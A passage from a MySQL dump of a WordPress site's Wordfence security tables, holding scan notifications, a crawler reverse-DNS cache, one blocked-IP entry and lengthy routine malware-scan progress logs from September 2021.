`new` tinyint(3) unsigned NOT NULL DEFAULT 1,
`category` varchar(255) NOT NULL,
`priority` int(11) NOT NULL DEFAULT 1000,
`ctime` int(10) unsigned NOT NULL,
`html` text NOT NULL,
`links` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfnotifications`
--
LOCK TABLES `wp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wp_wfnotifications` VALUES ('site-2UAAAAA',1,'wfplugin_scan',502,1631615574,'<a href=\"https://www.dogstardesign.co.uk/wp-adminadmin.php?page=WordfenceScan\">1254 issues found in most recent scan</a>','[]'),('site-AEAAAAA',1,'wfplugin_updates',502,1631615572,'<a href=\"https://www.dogstardesign.co.uk/wp-adminupdate-core.php\">Updates are available for WordPress (v5.8.1), 3 plugins, and 22 themes</a>','[]'),('site-AIAAAAA',0,'wfplugin_scan',502,1629715431,'<a href=\"https://www.dogstardesign.co.uk/wp-adminadmin.php?page=WordfenceScan\">1255 issues found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `wp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfpendingissues`
--
DROP TABLE IF EXISTS `wp_wfpendingissues`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfpendingissues` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`time` int(10) unsigned NOT NULL,
`lastUpdated` int(10) unsigned NOT NULL,
`status` varchar(10) NOT NULL,
`type` varchar(20) NOT NULL,
`severity` tinyint(3) unsigned NOT NULL,
`ignoreP` char(32) NOT NULL,
`ignoreC` char(32) NOT NULL,
`shortMsg` varchar(255) NOT NULL,
`longMsg` text DEFAULT NULL,
`data` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `lastUpdated` (`lastUpdated`),
KEY `status` (`status`),
KEY `ignoreP` (`ignoreP`),
KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfpendingissues`
--
LOCK TABLES `wp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wp_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfreversecache`
--
DROP TABLE IF EXISTS `wp_wfreversecache`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfreversecache` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`host` varchar(255) NOT NULL,
`lastUpdate` int(10) unsigned NOT NULL,
PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfreversecache`
--
LOCK TABLES `wp_wfreversecache` WRITE;
/*!40000 ALTER TABLE `wp_wfreversecache` DISABLE KEYS */;
INSERT INTO `wp_wfreversecache` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�B�','crawl-66-249-66-132.googlebot.com',1631543983),('\0\0\0\0\0\0\0\0\0\0��B�B�','crawl-66-249-66-134.googlebot.com',1631576660),('\0\0\0\0\0\0\0\0\0\0��B�B�','crawl-66-249-66-136.googlebot.com',1631598400),('\0\0\0\0\0\0\0\0\0\0��B�B�','crawl-66-249-66-140.googlebot.com',1631598066),('\0\0\0\0\0\0\0\0\0\0���n\r','194.110.13.14',1631558071);
/*!40000 ALTER TABLE `wp_wfreversecache` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfsnipcache`
--
DROP TABLE IF EXISTS `wp_wfsnipcache`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfsnipcache` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`IP` varchar(45) NOT NULL DEFAULT '',
`expiration` timestamp NOT NULL DEFAULT current_timestamp(),
`body` varchar(255) NOT NULL DEFAULT '',
`count` int(10) unsigned NOT NULL DEFAULT 0,
`type` int(10) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `expiration` (`expiration`),
KEY `IP` (`IP`),
KEY `type` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=5517 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfsnipcache`
--
LOCK TABLES `wp_wfsnipcache` WRITE;
/*!40000 ALTER TABLE `wp_wfsnipcache` DISABLE KEYS */;
INSERT INTO `wp_wfsnipcache` VALUES (5516,'91.206.200.13','2021-09-14 10:33:16','BLOCKED:600',0,1);
/*!40000 ALTER TABLE `wp_wfsnipcache` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfstatus`
--
DROP TABLE IF EXISTS `wp_wfstatus`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfstatus` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`ctime` double(17,6) unsigned NOT NULL,
`level` tinyint(3) unsigned NOT NULL,
`type` char(5) NOT NULL,
`msg` varchar(1000) NOT NULL,
PRIMARY KEY (`id`),
KEY `k1` (`ctime`),
KEY `k2` (`type`)
) ENGINE=InnoDB AUTO_INCREMENT=6011 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfstatus`
--
LOCK TABLES `wp_wfstatus` WRITE;
/*!40000 ALTER TABLE `wp_wfstatus` DISABLE KEYS */;
INSERT INTO `wp_wfstatus` VALUES (4816,1630268780.971720,2,'info','Scanned contents of 687 additional files at 39.19 per second'),(4817,1630268782.000340,2,'info','Scanned contents of 713 additional files at 38.42 per second'),(4818,1630268783.120980,2,'info','Scanned contents of 758 additional files at 38.52 per second'),(4819,1630268784.141153,2,'info','Scanned contents of 802 additional files at 38.74 per second'),(4820,1630268785.156345,2,'info','Scanned contents of 852 additional files at 39.24 per second'),(4821,1630268787.099956,2,'info','Scanned contents of 878 additional files at 37.11 per second'),(4822,1630268788.103535,2,'info','Scanned contents of 927 additional files at 37.59 per second'),(4823,1630268789.112979,2,'info','Scanned contents of 964 additional files at 37.55 per second'),(4824,1630268790.118988,2,'info','Scanned contents of 993 additional files at 37.22 per second'),(4825,1630268791.128891,2,'info','Scanned contents of 1022 additional files at 36.91 per second'),(4826,1630268792.145243,2,'info','Scanned contents of 1043 additional files at 36.34 per second'),(4827,1630268793.148536,2,'info','Scanned contents of 1066 additional files at 35.88 per second'),(4828,1630268794.155381,2,'info','Scanned contents of 1104 additional files at 35.94 per second'),(4829,1630268795.188090,2,'info','Scanned contents of 1124 additional files at 35.41 per second'),(4830,1630268796.212859,2,'info','Scanned contents of 1141 additional files at 34.82 per second'),(4831,1630268797.244183,2,'info','Scanned contents of 1162 additional files at 34.38 per second'),(4832,1630268798.247802,2,'info','Scanned contents of 1210 additional files at 34.76 per second'),(4833,1630268799.295101,2,'info','Scanned contents of 1258 additional files at 35.09 per second'),(4834,1630268800.295801,2,'info','Scanned contents of 1289 additional files at 34.98 per second'),(4835,1630268800.841591,2,'info','Scanned contents of 1316 additional files at 35.19 per second'),(4836,1630268800.844400,2,'info','Asking Wordfence to check URLs against malware list.'),(4837,1630268800.857092,2,'info','Checking 3277 host keys against Wordfence scanning servers.'),(4838,1630268801.614330,2,'info','Done host key check.'),(4839,1630268802.532300,2,'info','Done file contents scan'),(4845,1630268803.805319,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(4846,1630268803.809111,2,'info','Checking 373 host keys against Wordfence scanning servers.'),(4847,1630268804.609274,2,'info','Done host key check.'),(4848,1630268804.619961,2,'info','Done examining URLs'),(4853,1630268805.084980,2,'info','Starting password strength check on 0 users.'),(4860,1630268808.559317,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(4861,1630268808.561416,2,'info','Done examining URLs'),(4863,1630268808.625732,1,'info','-------------------'),(4864,1630268808.627734,2,'info','Wordfence used 21.52 MB of memory for scan. Server peak memory usage was: 43.52 MB'),(4865,1630268808.629708,1,'info','Scan Complete. Scanned 7058 files, 5 plugins, 31 themes, 13 posts, 0 comments and 3837 URLs in 4 minutes 39 seconds.'),(4868,1630319731.031151,1,'info','Initiating quick scan'),(4873,1630319731.597232,1,'info','-------------------'),(4874,1630319731.622730,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(4875,1630319731.654668,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(4878,1630406236.935239,1,'info','Initiating quick scan'),(4883,1630406237.394875,1,'info','-------------------'),(4884,1630406237.417443,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(4885,1630406237.420001,1,'info','Quick Scan Complete. Scanned in 1 second.'),(4888,1630494114.555617,1,'info','Initiating quick scan'),(4893,1630494115.402132,1,'info','-------------------'),(4894,1630494115.444015,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 10 MB'),(4895,1630494115.455412,1,'info','Quick Scan Complete. Scanned in 1 second.'),(4897,1630529599.028145,1,'info','Scheduled Wordfence scan starting at Wednesday 1st of September 2021 08:53:19 PM'),(4899,1630529599.666651,1,'info','Contacting Wordfence to initiate scan'),(4906,1630529609.963570,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(4907,1630529609.985521,2,'info','The disk has 3458203.98 MB available'),(4915,1630529610.370689,2,'info','Getting plugin list from WordPress'),(4916,1630529610.378932,2,'info','Found 4 plugins'),(4917,1630529610.382479,2,'info','Getting theme list from WordPress'),(4918,1630529610.399459,2,'info','Found 31 themes'),(4930,1630529613.130585,2,'info','500 files indexed'),(4931,1630529613.187251,2,'info','1000 files indexed'),(4932,1630529613.292586,2,'info','1500 files indexed'),(4933,1630529613.399731,2,'info','2000 files indexed'),(4934,1630529613.461030,2,'info','2500 files indexed'),(4935,1630529613.540034,2,'info','3000 files indexed'),(4936,1630529613.606589,2,'info','3500 files indexed'),(4937,1630529613.739768,2,'info','4000 files indexed'),(4938,1630529613.815868,2,'info','4500 files indexed'),(4939,1630529613.906418,2,'info','5000 files indexed'),(4940,1630529613.981363,2,'info','5500 files indexed'),(4941,1630529614.049553,2,'info','6000 files indexed'),(4942,1630529614.101275,2,'info','6500 files indexed'),(4943,1630529614.242338,2,'info','7000 files indexed'),(4944,1630529614.269965,2,'info','7058 files indexed'),(4945,1630529618.042798,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(4946,1630529622.220729,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(4947,1630529625.684854,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(4948,1630529629.525267,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(4949,1630529631.785929,2,'info','Analyzed 500 files containing 8.09 MB of data so far'),(4950,1630529635.455490,2,'info','Analyzed 600 files containing 8.94 MB of data so far'),(4951,1630529638.657646,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(4952,1630529642.236371,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(4953,1630529645.760669,2,'info','Analyzed 900 files containing 12.87 MB of data so far'),(4954,1630529649.105161,2,'info','Analyzed 1000 files containing 18.33 MB of data so far'),(4955,1630529651.499247,2,'info','Analyzed 1100 files containing 19.81 MB of data so far'),(4956,1630529653.750922,2,'info','Analyzed 1200 files containing 21.37 MB of data so far'),(4957,1630529655.707596,2,'info','Analyzed 1300 files containing 21.71 MB of data so far'),(4958,1630529658.467512,2,'info','Analyzed 1400 files containing 22.65 MB of data so far'),(4959,1630529661.411675,2,'info','Analyzed 1500 files containing 22.68 MB of data so far'),(4960,1630529663.127833,2,'info','Analyzed 1600 files containing 22.71 MB of data so far'),(4961,1630529666.063239,2,'info','Analyzed 1700 files containing 24.06 MB of data so far'),(4962,1630529668.398523,2,'info','Analyzed 1800 files containing 24.7 MB of data so far'),(4963,1630529670.117742,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(4964,1630529672.232874,2,'info','Analyzed 2000 files containing 27.51 MB of data so far'),(4965,1630529673.931532,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(4966,1630529676.265619,2,'info','Analyzed 2200 files containing 30.3 MB of data so far'),(4967,1630529677.973089,2,'info','Analyzed 2300 files containing 32.72 MB of data so far'),(4968,1630529679.674577,2,'info','Analyzed 2400 files containing 34.44 MB of data so far'),(4969,1630529681.952369,2,'info','Analyzed 2500 files containing 35.38 MB of data so far'),(4970,1630529683.898659,2,'info','Analyzed 2600 files containing 36.27 MB of data so far'),(4971,1630529685.950830,2,'info','Analyzed 2700 files containing 39.94 MB of data so far'),(4972,1630529687.516654,2,'info','Analyzed 2800 files containing 41.31 MB of data so far'),(4973,1630529689.282135,2,'info','Analyzed 2900 files containing 43.38 MB of data so far'),(4974,1630529692.103654,2,'info','Analyzed 3000 files containing 46.43 MB of data so far'),(4975,1630529693.830719,2,'info','Analyzed 3100 files containing 48.47 MB of data so far'),(4976,1630529695.410834,2,'info','Analyzed 3200 files containing 53.86 MB of data so far'),(4977,1630529697.647291,2,'info','Analyzed 3300 files containing 54.73 MB of data so far'),(4978,1630529699.290707,2,'info','Analyzed 3400 files containing 55.15 MB of data so far'),(4979,1630529701.318274,2,'info','Analyzed 3500 files containing 57 MB of data so far'),(4980,1630529702.843852,2,'info','Analyzed 3600 files containing 58.95 MB of data so far'),(4981,1630529704.494460,2,'info','Analyzed 3700 files containing 61.75 MB of data so far'),(4982,1630529707.437326,2,'info','Analyzed 3800 files containing 62.85 MB of data so far'),(4983,1630529709.004521,2,'info','Analyzed 3900 files containing 65.39 MB of data so far'),(4984,1630529713.066281,2,'info','Analyzed 4000 files containing 71.97 MB of data so far'),(4985,1630529714.912576,2,'info','Analyzed 4100 files containing 73.58 MB of data so far'),(4986,1630529717.953843,2,'info','Analyzed 4200 files containing 77.06 MB of data so far'),(4987,1630529720.007913,2,'info','Analyzed 4300 files containing 78.51 MB of data so far'),(4988,1630529722.352851,2,'info','Analyzed 4400 files containing 79.56 MB of data so far'),(4989,1630529725.200649,2,'info','Analyzed 4500 files containing 81.16 MB of data so far'),(4990,1630529727.621471,2,'info','Analyzed 4600 files containing 84.73 MB of data so far'),(4991,1630529731.574573,2,'info','Analyzed 4700 files containing 85.52 MB of data so far'),(4992,1630529734.501617,2,'info','Analyzed 4800 files containing 86.31 MB of data so far'),(4993,1630529738.282949,2,'info','Analyzed 4900 files containing 88.24 MB of data so far'),(4994,1630529741.523567,2,'info','Analyzed 5000 files containing 90.82 MB of data so far'),(4995,1630529744.829619,2,'info','Analyzed 5100 files containing 92.25 MB of data so far'),(4996,1630529748.234039,2,'info','Analyzed 5200 files containing 101.17 MB of data so far'),(4997,1630529751.444794,2,'info','Analyzed 5300 files containing 107.15 MB of data so far'),(4998,1630529754.448670,2,'info','Analyzed 5400 files containing 108.49 MB of data so far'),(4999,1630529758.121607,2,'info','Analyzed 5500 files containing 110.89 MB of data so far'),(5000,1630529762.050168,2,'info','Analyzed 5600 files containing 114.88 MB of data so far'),(5001,1630529765.612904,2,'info','Analyzed 5700 files containing 116.68 MB of data so far'),(5002,1630529769.059838,2,'info','Analyzed 5800 files containing 118.07 MB of data so far'),(5003,1630529773.058737,2,'info','Analyzed 5900 files containing 119.9 MB of data so far'),(5004,1630529775.708923,2,'info','Analyzed 6000 files containing 120.61 MB of data so far'),(5005,1630529779.069528,2,'info','Analyzed 6100 files containing 122.2 MB of data so far'),(5006,1630529782.717078,2,'info','Analyzed 6200 files containing 125.2 MB of data so far'),(5007,1630529787.705398,2,'info','Analyzed 6300 files containing 126.85 MB of data so far'),(5008,1630529790.812047,2,'info','Analyzed 6400 files containing 128.46 MB of data so far'),(5009,1630529794.485280,2,'info','Analyzed 6500 files containing 139.17 MB of data so far'),(5010,1630529798.449110,2,'info','Analyzed 6600 files containing 142.68 MB of data so far'),(5011,1630529801.359814,2,'info','Analyzed 6700 files containing 144.97 MB of data so far'),(5012,1630529806.292875,2,'info','Analyzed 6800 files containing 147.71 MB of data so far'),(5013,1630529810.138855,2,'info','Analyzed 6900 files containing 150.82 MB of data so far'),(5014,1630529814.048220,2,'info','Analyzed 7000 files containing 151.96 MB of data so far'),(5015,1630529816.265557,2,'info','Analyzed 7058 files containing 153.04 MB of data.'),(5023,1630529818.090235,2,'info','Starting scan of file contents'),(5024,1630529819.146865,2,'info','Scanned contents of 23 additional files at 22.43 per second'),(5025,1630529820.162809,2,'info','Scanned contents of 48 additional files at 23.51 per second'),(5026,1630529821.528639,2,'info','Scanned contents of 75 additional files at 22.01 per second'),(5027,1630529822.553362,2,'info','Scanned contents of 91 additional files at 20.53 per second'),(5028,1630529823.558058,2,'info','Scanned contents of 135 additional files at 24.83 per second'),(5029,1630529824.600156,2,'info','Scanned contents of 166 additional files at 25.62 per second'),(5030,1630529825.615365,2,'info','Scanned contents of 193 additional files at 25.75 per second'),(5031,1630529826.620021,2,'info','Scanned contents of 232 additional files at 27.30 per second'),(5032,1630529827.630399,2,'info','Scanned contents of 281 additional files at 29.55 per second'),(5033,1630529828.680996,2,'info','Scanned contents of 330 additional files at 31.25 per second'),(5034,1630529829.696342,2,'info','Scanned contents of 388 additional files at 33.52 per second'),(5035,1630529830.717508,2,'info','Scanned contents of 445 additional files at 35.33 per second'),(5036,1630529831.737569,2,'info','Scanned contents of 494 additional files at 36.28 per second'),(5037,1630529832.753363,2,'info','Scanned contents of 534 additional files at 36.50 per second'),(5038,1630529833.780609,2,'info','Scanned contents of 545 additional files at 34.80 per second'),(5039,1630529834.792745,2,'info','Scanned contents of 608 additional files at 36.47 per second'),(5040,1630529835.805754,2,'info','Scanned contents of 650 additional files at 36.76 per second'),(5041,1630529836.815111,2,'info','Scanned contents of 687 additional files at 36.75 per second'),(5042,1630529837.862365,2,'info','Scanned contents of 732 additional files at 37.08 per second'),(5043,1630529838.947887,2,'info','Scanned contents of 785 additional files at 37.69 per second'),(5044,1630529839.967077,2,'info','Scanned contents of 831 additional files at 38.04 per second'),(5045,1630529840.979223,2,'info','Scanned contents of 853 additional files at 37.32 per second'),(5046,1630529842.442406,2,'info','Scanned contents of 881 additional files at 36.22 per second'),(5047,1630529843.453181,2,'info','Scanned contents of 917 additional files at 36.20 per second'),(5048,1630529844.499904,2,'info','Scanned contents of 965 additional files at 36.58 per second'),(5049,1630529845.505389,2,'info','Scanned contents of 1006 additional files at 36.74 per second'),(5050,1630529846.514640,2,'info','Scanned contents of 1046 additional files at 36.84 per second'),(5051,1630529847.537370,2,'info','Scanned contents of 1076 additional files at 36.58 per second'),(5052,1630529848.565170,2,'info','Scanned contents of 1098 additional files at 36.07 per second'),(5053,1630529849.577961,2,'info','Scanned contents of 1137 additional files at 36.15 per second'),(5054,1630529850.610990,2,'info','Scanned contents of 1199 additional files at 36.90 per second'),(5055,1630529851.614433,2,'info','Scanned contents of 1236 additional files at 36.90 per second'),(5056,1630529852.620012,2,'info','Scanned contents of 1255 additional files at 36.38 per second'),(5057,1630529853.695251,2,'info','Scanned contents of 1279 additional files at 35.95 per second'),(5058,1630529854.705441,2,'info','Scanned contents of 1309 additional files at 35.78 per second'),(5059,1630529854.813967,2,'info','Scanned contents of 1316 additional files at 35.87 per second'),(5060,1630529854.815921,2,'info','Asking Wordfence to check URLs against malware list.'),(5061,1630529854.821117,2,'info','Checking 3281 host keys against Wordfence scanning servers.'),(5062,1630529855.578245,2,'info','Done host key check.'),(5063,1630529855.655487,2,'info','Done file contents scan'),(5069,1630529855.954869,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(5070,1630529855.965747,2,'info','Checking 373 host keys against Wordfence scanning servers.'),(5071,1630529856.738814,2,'info','Done host key check.'),(5072,1630529856.764770,2,'info','Done examining URLs'),(5077,1630529858.974900,2,'info','Starting password strength check on 0 users.'),(5084,1630529862.575132,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(5085,1630529862.586840,2,'info','Done examining URLs'),(5087,1630529862.811241,1,'info','-------------------'),(5088,1630529862.813425,2,'info','Wordfence used 21.54 MB of memory for scan. Server peak memory usage was: 43.54 MB'),(5089,1630529862.815467,1,'info','Scan Complete. Scanned 7058 files, 5 plugins, 31 themes, 13 posts, 0 comments and 3841 URLs in 4 minutes 22 seconds.'),(5092,1630579714.560638,1,'info','Initiating quick scan'),(5097,1630579715.116831,1,'info','-------------------'),(5098,1630579715.135660,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5099,1630579715.138180,1,'info','Quick Scan Complete. Scanned in 1 second.'),(5102,1630665631.386996,1,'info','Initiating quick scan'),(5107,1630665632.599585,1,'info','-------------------'),(5108,1630665632.643972,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5109,1630665632.654568,1,'info','Quick Scan Complete. Scanned in 1 second.'),(5112,1630751622.122976,1,'info','Initiating quick scan'),(5117,1630751622.824751,1,'info','-------------------'),(5118,1630751622.855904,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5119,1630751622.867863,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(5121,1630787236.095401,1,'info','Scheduled Wordfence scan starting at Saturday 4th of September 2021 08:27:16 PM'),(5123,1630787236.675829,1,'info','Contacting Wordfence to initiate scan'),(5130,1630787244.065496,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(5131,1630787244.075414,2,'info','The disk has 3458428.64 MB available'),(5139,1630787244.183478,2,'info','Getting plugin list from WordPress'),(5140,1630787244.198910,2,'info','Found 4 plugins'),(5141,1630787244.201012,2,'info','Getting theme list from WordPress'),(5142,1630787244.214233,2,'info','Found 31 themes'),(5154,1630787247.463085,2,'info','500 files indexed'),(5155,1630787247.560087,2,'info','1000 files indexed'),(5156,1630787247.668661,2,'info','1500 files indexed'),(5157,1630787247.806759,2,'info','2000 files indexed'),(5158,1630787247.871243,2,'info','2500 files indexed'),(5159,1630787247.985963,2,'info','3000 files indexed'),(5160,1630787248.112158,2,'info','3500 files indexed'),(5161,1630787248.202238,2,'info','4000 files indexed'),(5162,1630787248.254430,2,'info','4500 files indexed'),(5163,1630787248.471507,2,'info','5000 files indexed'),(5164,1630787248.533696,2,'info','5500 files indexed'),(5165,1630787248.592494,2,'info','6000 files indexed'),(5166,1630787248.727757,2,'info','6500 files indexed'),(5167,1630787248.897348,2,'info','7000 files indexed'),(5168,1630787248.923357,2,'info','7058 files indexed'),(5169,1630787251.965832,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(5170,1630787255.550694,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(5171,1630787258.310518,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(5172,1630787261.181318,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(5173,1630787263.598838,2,'info','Analyzed 500 files containing 8.09 MB of data so far'),(5174,1630787267.510042,2,'info','Analyzed 600 files containing 8.94 MB of data so far'),(5175,1630787273.305044,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(5176,1630787276.893116,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(5177,1630787280.466307,2,'info','Analyzed 900 files containing 12.87 MB of data so far'),(5178,1630787284.274499,2,'info','Analyzed 1000 files containing 18.33 MB of data so far'),(5179,1630787288.191724,2,'info','Analyzed 1100 files containing 19.81 MB of data so far'),(5180,1630787291.334241,2,'info','Analyzed 1200 files containing 21.37 MB of data so far'),(5181,1630787293.729870,2,'info','Analyzed 1300 files containing 21.71 MB of data so far'),(5182,1630787298.886412,2,'info','Analyzed 1400 files containing 22.65 MB of data so far'),(5183,1630787302.965898,2,'info','Analyzed 1500 files containing 22.68 MB of data so far'),(5184,1630787305.097728,2,'info','Analyzed 1600 files containing 22.71 MB of data so far'),(5185,1630787308.084708,2,'info','Analyzed 1700 files containing 24.06 MB of data so far'),(5186,1630787310.744514,2,'info','Analyzed 1800 files containing 24.7 MB of data so far'),(5187,1630787313.196443,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(5188,1630787315.052144,2,'info','Analyzed 2000 files containing 27.51 MB of data so far'),(5189,1630787317.878090,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(5190,1630787321.014832,2,'info','Analyzed 2200 files containing 30.3 MB of data so far'),(5191,1630787323.588204,2,'info','Analyzed 2300 files containing 32.72 MB of data so far'),(5192,1630787325.439314,2,'info','Analyzed 2400 files containing 34.44 MB of data so far'),(5193,1630787327.618959,2,'info','Analyzed 2500 files containing 35.38 MB of data so far'),(5194,1630787329.990704,2,'info','Analyzed 2600 files containing 36.27 MB of data so far'),(5195,1630787332.444062,2,'info','Analyzed 2700 files containing 39.94 MB of data so far'),(5196,1630787335.375851,2,'info','Analyzed 2800 files containing 41.31 MB of data so far'),(5197,1630787338.005030,2,'info','Analyzed 2900 files containing 43.38 MB of data so far'),(5198,1630787341.161125,2,'info','Analyzed 3000 files containing 46.43 MB of data so far'),(5199,1630787343.544671,2,'info','Analyzed 3100 files containing 48.47 MB of data so far'),(5200,1630787346.865944,2,'info','Analyzed 3200 files containing 53.86 MB of data so far'),(5201,1630787349.355746,2,'info','Analyzed 3300 files containing 54.73 MB of data so far'),(5202,1630787352.073912,2,'info','Analyzed 3400 files containing 55.15 MB of data so far'),(5203,1630787354.540868,2,'info','Analyzed 3500 files containing 57 MB of data so far'),(5204,1630787356.605577,2,'info','Analyzed 3600 files containing 58.95 MB of data so far'),(5205,1630787359.169451,2,'info','Analyzed 3700 files containing 61.75 MB of data so far'),(5206,1630787361.928409,2,'info','Analyzed 3800 files containing 62.85 MB of data so far'),(5207,1630787364.231348,2,'info','Analyzed 3900 files containing 65.39 MB of data so far'),(5208,1630787367.531309,2,'info','Analyzed 4000 files containing 71.97 MB of data so far'),(5209,1630787371.614119,2,'info','Analyzed 4100 files containing 73.58 MB of data so far'),(5210,1630787374.080658,2,'info','Analyzed 4200 files containing 77.06 MB of data so far'),(5211,1630787376.876049,2,'info','Analyzed 4300 files containing 78.51 MB of data so far'),(5212,1630787379.468938,2,'info','Analyzed 4400 files containing 79.56 MB of data so far'),(5213,1630787381.779391,2,'info','Analyzed 4500 files containing 81.16 MB of data so far'),(5214,1630787385.707781,2,'info','Analyzed 4600 files containing 84.73 MB of data so far'),(5215,1630787390.285724,2,'info','Analyzed 4700 files containing 85.52 MB of data so far'),(5216,1630787392.875928,2,'info','Analyzed 4800 files containing 86.31 MB of data so far'),(5217,1630787396.880878,2,'info','Analyzed 4900 files containing 88.24 MB of data so far'),(5218,1630787400.634268,2,'info','Analyzed 5000 files containing 90.82 MB of data so far'),(5219,1630787403.678906,2,'info','Analyzed 5100 files containing 92.25 MB of data so far'),(5220,1630787407.472011,2,'info','Analyzed 5200 files containing 101.17 MB of data so far'),(5221,1630787412.012347,2,'info','Analyzed 5300 files containing 107.15 MB of data so far'),(5222,1630787416.451319,2,'info','Analyzed 5400 files containing 108.49 MB of data so far'),(5223,1630787420.323637,2,'info','Analyzed 5500 files containing 110.89 MB of data so far'),(5224,1630787424.469957,2,'info','Analyzed 5600 files containing 114.88 MB of data so far'),(5225,1630787427.990996,2,'info','Analyzed 5700 files containing 116.68 MB of data so far'),(5226,1630787432.038432,2,'info','Analyzed 5800 files containing 118.07 MB of data so far'),(5227,1630787435.304701,2,'info','Analyzed 5900 files containing 119.9 MB of data so far'),(5228,1630787440.984805,2,'info','Analyzed 6000 files containing 120.61 MB of data so far'),(5229,1630787444.750370,2,'info','Analyzed 6100 files containing 122.2 MB of data so far'),(5230,1630787449.721392,2,'info','Analyzed 6200 files containing 125.2 MB of data so far'),(5231,1630787453.568392,2,'info','Analyzed 6300 files containing 126.85 MB of data so far'),(5232,1630787458.738585,2,'info','Analyzed 6400 files containing 128.46 MB of data so far'),(5233,1630787463.105385,2,'info','Analyzed 6500 files containing 139.17 MB of data so far'),(5234,1630787467.013037,2,'info','Analyzed 6600 files containing 142.68 MB of data so far'),(5235,1630787470.678191,2,'info','Analyzed 6700 files containing 144.97 MB of data so far'),(5236,1630787475.506145,2,'info','Analyzed 6800 files containing 147.71 MB of data so far'),(5237,1630787479.485755,2,'info','Analyzed 6900 files containing 150.82 MB of data so far'),(5238,1630787482.489220,2,'info','Analyzed 7000 files containing 151.96 MB of data so far'),(5239,1630787484.717021,2,'info','Analyzed 7058 files containing 153.04 MB of data.'),(5247,1630787486.517166,2,'info','Starting scan of file contents'),(5248,1630787487.560435,2,'info','Scanned contents of 32 additional files at 31.33 per second'),(5249,1630787488.594434,2,'info','Scanned contents of 75 additional files at 36.49 per second'),(5250,1630787489.625338,2,'info','Scanned contents of 111 additional files at 35.97 per second'),(5251,1630787490.637111,2,'info','Scanned contents of 146 additional files at 35.63 per second'),(5252,1630787491.664162,2,'info','Scanned contents of 180 additional files at 35.12 per second'),(5253,1630787492.667752,2,'info','Scanned contents of 208 additional files at 33.94 per second'),(5254,1630787493.670229,2,'info','Scanned contents of 238 additional files at 33.37 per second'),(5255,1630787494.719788,2,'info','Scanned contents of 254 additional files at 31.05 per second'),(5256,1630787495.729386,2,'info','Scanned contents of 284 additional files at 30.90 per second'),(5257,1630787496.734469,2,'info','Scanned contents of 318 additional files at 31.19 per 